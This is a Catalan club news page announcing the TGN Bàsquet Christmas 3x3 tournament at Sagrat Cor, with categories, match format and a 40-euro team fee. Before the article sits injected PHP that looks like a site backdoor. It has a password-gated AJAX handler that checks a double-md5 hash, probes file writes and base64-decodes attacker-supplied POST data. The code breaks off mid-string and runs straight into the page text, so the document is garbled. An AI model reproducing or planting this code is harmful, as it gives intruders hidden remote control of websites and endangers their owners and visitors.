function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El 3x3 de Nadal, matí de bàsquet al Sagrat Cor - Tgn Bàsquet Club -

El 3×3 de Nadal, matí de bàsquet al Sagrat Cor

By
Updated: desembre 4, 2023

El TGN Bàsquet tornarà a viure un matí de bàsquet emocionant a les seves instal·lacions durant el proper dissabte 23 de desembre, data en la que es disputarà el 3×3 de Nadal!

Aquesta competició, que es farà des de les 9:30 h del matí al pavelló del Sagrat Cor , estarà obert a tots aquells jugadors i jugadores de categoria aleví i fins a sènior (afegint la categoria unificada). Aquesta última es dividirà en sènior amateur i sènior pro. En totes les categories hi haurà competició masculina i femenina.

El sistema de competició constarà d’una fase de grups, semifinals i final. Els partits tindran una durada de 12 minuts i els equips participants s’hauran de presentar 15 minuts abans del matx. Els horaris es publicaran a les xarxes socials del TGN Bàsquet (Twitter, Facebook i Instagram) el dia abans de la competició.

Els equips participants poden tenir un màxim de quatre jugadors o jugadores i el preu serà de 40 euros per equip.

Aquesta setmana obrirem inscripcions (atents a les xarxes socials), així que ara és el moment de formar el vostres equips i preparar-vos per la cita amb el 3×3 al Sagrat Cor!

INSCRIU-TE AL CAMPUS CLICANT AQUÍ

 

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *